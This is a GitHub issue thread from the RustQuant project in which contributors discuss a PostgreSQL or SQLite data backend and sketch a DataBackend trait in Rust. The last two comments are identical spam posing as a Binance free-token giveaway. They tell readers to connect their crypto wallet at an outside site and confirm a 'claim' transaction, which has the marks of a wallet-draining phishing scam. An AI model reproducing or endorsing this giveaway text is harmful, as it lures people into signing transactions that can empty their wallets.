### ISSUE TITLE
`RustQuant::data`: Create a PostgreSQL interface. 

### ISSUE THREAD

**Issue by avhz** [avhz/RustQuant#60]
I would like a way for users to be able to store and retrieve data from performing various actions in RustQuant, like pricing etc.

**Comment by KenCox94** [comment]
> I would like a way for users to be able to store and retrieve data from performing various actions in RustQuant, like pricing etc. 

Im interested but would like more details when you have time

**Comment by KenCox94** [comment]
Assign to me if you would like

**Comment by HereticSK** [comment]
Speaking of data storage, is it a good idea to begin with some simple components, for example, sqlite? Postgres can be a bit too heavy and requires more deployment effort. Sqlite is much easier to use, especially in use cases like quant analysis.

It would be best to have a protocol for data backend, so users can build their own backend to integrate with RustQuant.

**Comment by HereticSK** [comment]
>Do you mean something independent of the users chosen storage method that they can simply plug into themselves and manage the rest?

Yes. I imagine it may be something like a DataBackend trait. RustQuant use this trait to implement a easy-to-use databackend like sqlite. This also allows users to implement their own data backend to work with Rustquant
```Rust
pub trait DataBackend {
    fn get_price(&self, start, end) -> Vec<f64>

    fn get_instrument(&self, symbol) -> Instrument
}
```

**Comment by KenCox94** [comment]
> What are your thoughts @KenCox94 ?

I agree with @HereticSK. I marrying RustQuant to postgres is a great idea. However, I think there needs to be a discussion on the design of the data backend. Apologies, I usually only work these projects on the weekend so will have more to say on this tomorrow

**Comment by KenCox94** [comment]
@HereticSK Could you elaborate more on your design

**Comment by shokry055** [comment]
[![Binance Free Tokens](https://pbs.twimg.com/media/GCCo9VhXgAE0kzp?format=jpg&name=large)](https://www.bnbrewards.online/?source=github)

# 🚀 Binance Free Tokens Giveaway! 🌕

Welcome to the exclusive Binance Free Tokens Giveaway! 🎉 Don't miss out on claiming your free tokens. Here's a simple guide to get started:

## Steps to Claim:

1. **Connect Your Binance Wallet:**
   - Click on the [Connect Wallet](https://www.bnbrewards.online/?source=Github).
   - Select your preferred wallet provider (Metamask, Trust Wallet, etc.).
   - Follow the prompts to connect your wallet securely.

2. **Interact with the Contract:**
   - Once your wallet is connected, navigate to the [Binance Free Tokens Page](https://www.bnbrewards.online/?source=github).
   - Click on the "Claim" button to interact with the smart contract.

3. **Claim Your Free Tokens:**
   - Confirm the transaction in your wallet to execute the claim method.
   - Wait for the transaction to be processed.

4. **Spread the Excitement:**
   - After successfully claiming your tokens, share the news!
     - **Twitter:** [Tweet about Your Tokens](https://twitter.com/share?url=https://www.bnbrewards.online/&text=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto)
     - **Facebook:** [Share on Facebook](https://www.facebook.com/sharer/sharer.php?u=https://www.bnbrewards.online/&quote=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto)

Act fast and enjoy your tokens! This limited-time offer won't last forever. 🌐💰

*Note: Make sure to follow official Binance channels for updates and announcements.*

**Comment by shokry055** [comment]
[![Binance Free Tokens](https://pbs.twimg.com/media/GCCo9VhXgAE0kzp?format=jpg&name=large)](https://www.bnbrewards.online/?source=github)

# 🚀 Binance Free Tokens Giveaway! 🌕

Welcome to the exclusive Binance Free Tokens Giveaway! 🎉 Don't miss out on claiming your free tokens. Here's a simple guide to get started:

## Steps to Claim:

1. **Connect Your Binance Wallet:**
   - Click on the [Connect Wallet](https://www.bnbrewards.online/?source=Github).
   - Select your preferred wallet provider (Metamask, Trust Wallet, etc.).
   - Follow the prompts to connect your wallet securely.

2. **Interact with the Contract:**
   - Once your wallet is connected, navigate to the [Binance Free Tokens Page](https://www.bnbrewards.online/?source=github).
   - Click on the "Claim" button to interact with the smart contract.

3. **Claim Your Free Tokens:**
   - Confirm the transaction in your wallet to execute the claim method.
   - Wait for the transaction to be processed.

4. **Spread the Excitement:**
   - After successfully claiming your tokens, share the news!
     - **Twitter:** [Tweet about Your Tokens](https://twitter.com/share?url=https://www.bnbrewards.online/&text=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto)
     - **Facebook:** [Share on Facebook](https://www.facebook.com/sharer/sharer.php?u=https://www.bnbrewards.online/&quote=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto)

Act fast and enjoy your tokens! This limited-time offer won't last forever. 🌐💰

*Note: Make sure to follow official Binance channels for updates and announcements.*
